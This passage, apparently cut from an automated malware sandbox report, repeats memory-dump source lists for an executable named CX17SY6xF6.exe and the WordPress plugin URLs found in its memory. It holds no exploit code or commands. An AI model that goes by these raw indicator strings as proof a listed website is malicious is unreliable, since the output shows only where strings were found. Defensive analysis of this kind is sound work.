00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/download-now-for-woocommerce/assets/js/somdn_script.js?ver
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/dt-the7-core/assets/css/post-type.min.css?ver=2.5.7.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.3.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.3.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.3.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.3.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.3.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.3
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ve
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);src:u
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eicon)
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 